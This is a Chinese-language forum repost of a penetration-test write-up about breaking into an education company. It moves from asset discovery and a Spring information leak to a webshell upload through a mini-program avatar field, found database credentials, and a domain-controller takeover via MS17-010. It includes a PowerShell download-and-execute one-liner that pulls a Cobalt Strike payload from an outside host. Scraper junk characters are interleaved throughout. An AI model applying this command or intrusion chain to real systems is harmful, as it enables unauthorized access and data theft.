" g2 |6 x2 B/ I, @9 U) U4 t# z 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ @( n, Y1 l* G9 F( ]0 N c
1 ^( v# z/ O6 F9 g2 y2 W0 F9 h: ^
: y, V. l0 L; v3 b% K# g0 b3 z 正文& ` }! z% e K' Q/ \
) J# [$ l0 c' J- @- e, w% i' z7 x8 P! Y! O
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能' z! J) ^- v0 d6 o6 i# E7 p/ t) F
/ S, l5 [6 k9 w% [ 6 S- ~' k) |4 a, F1 W* X
& L- R% |5 B5 M# o0 ?$ u2 S0 r
进行了简单的信息搜集
# z1 i/ @% p. L; R) e0 Y9 o) M
" N$ K7 b. `! O6 \1 B: D: B
4 v! J, @$ G+ m" {1 }- a6 F 子域名搜集0 ]; P! J2 h! G7 m
- a: t( \' R/ H% w: ~6 _5 B) |7 b8 W2 l
fofa找资产
! [/ X: L" g% [' w' n / b8 l( y2 |8 h& p
1 L; e4 g) i& ~, ]$ o7 r. }" R
一共七个资产。去重之后只有两个。
: w# X6 n% D& D6 Z) d% A2 }4 e. t! g
目录探测
7 U9 ] @* v5 t+ y F% B) _4 \# b4 S6 k" i8 s; c4 C( D 3 \- I* R1 V! B/ f: X1 m
. k3 a+ w1 M/ ?$ v8 Z {6 ?( j$ h' |6 K
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' A5 r4 I* D7 I u( g" }
% a. E$ ~4 u# d0 |; _( S" u
: x, I/ _1 ^5 D& y 我又尝试了通过修改返回包来绕过登录界面1 ?% b. J8 j( z6 z
W' s2 L2 w S0 D# i% ~6 a4 k8 h0 s' y& v
+ `" R' Q9 M5 [9 n1 i 还是不行,尝试注入无果
/ v# k! W' q& z+ f/ [+ S4 ^$ J
不过我目录探测出了一处Spring信息泄露
s. {6 r7 Q* q ' B) @: b" k. M* \4 x* n& z/ W' X
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录5 \; Y. V2 u: t! v
4 p; _6 _* O( t9 o) N $ T' g( D+ P+ j
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。, a& q5 P( f( C
5 u! m3 C1 X* D8 @" _% N' h9 E8 U' T1 V. \5 Y8 c # a$ O- v; @. u; ]- C+ Z( z, v
7 u+ q- g9 s, `9 r7 r& h: z5 H* T4 `. B, z2 J- N( a 获取有些师傅到这一步就手机抓包电脑测了。3 g5 H" e* q5 ]( b, g; |+ V* y
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( ^3 b8 L9 M" f, V
6 ?* {- P' y% Y; O q& W其中在一个公众号发现了小程序,可以进行注册。/ P! v. v/ S! x$ v2 M
1 v& c6 U& \3 V4 P 看到了头像上传,尝试上传获取WebShell" A- F( c1 t' Q! U) A) ~) E
& I/ o6 c+ R7 k7 A- I# b; n$ U5 y, I1 J% K4 h: [7 L: ^6 A% D1 F
% @9 Q) G: P+ {' o7 j5 b) `9 A g# ~% S- A j! w. ] 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 _, C9 ^- X" x! h c' D7 r6 O - j Z- w, `1 x F0 d8 m
然后上了大马
f9 t* I9 L" S& |9 `* s - a. |: I& F3 F+ J: D6 x
3 d. q8 L) ]) L9 x! S; ~
7 A& P3 G; @0 l+ Z 通过翻找文件发现数据库账号密码9 {/ o3 G% M9 c; a
7 `+ b( }' Y J. ^" n* S/ G; S5 u% {5 \8 P3 K" d; [9 O 3 F+ ` D& H2 j* j
--内网渗透
直接通过powershell执行 cs上线% ^5 ]2 P& g2 C' k" ~6 n
$ M1 m! o- W5 z& q1 Zpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"# C0 F3 K; G c( u9 O, r( l' A* G
. N" c* L! l$ f$ m, N6 J4 ^, k6 m1 M+ p5 | ! q- @8 n: |" O
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) D" Z/ G& v4 G# |- m ?! Z4 r
- e( U& C# O- U" b* e! a$ @% V/ G7 O, X6 h$ m
8 w' u# ~: g+ ~% S7 O) c3 n, Z5 w! d9 q, |
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
U- C- r& j- k8 h
$ Z' S& _9 f! |8 ^ 5 a- u+ }* h T* P3 T
; U) Y, S0 ~6 m6 q( d. D6 ?
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 d' u9 e3 R/ Q$ B, Y7 |
# E: z$ A) |5 e' Z5 ^
% ?7 i+ N1 T. @/ g* K6 L
# L5 P3 m3 K+ W# y. ?+ _! S
( L! E, } i' {
( T0 j6 }; Q2 t
" M7 f i/ n. S1 {+ E7 Y& ]$ @3 r
5 x0 K: p* a* \8 b" D, a. s7 D " B& }5 ?* d% ^, x* u) _
" d4 D3 O7 B9 G 小结
& I5 w4 R7 `. E9 Y8 N 9 S O( s$ R* ]- \5 D/ q9 y
1 X& O: j" B# Q4 w/ p5 h 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
0 X! f _$ J, ~# h1 t+ c 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
6 l1 x2 d1 `1 _5 Y j6 x5 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |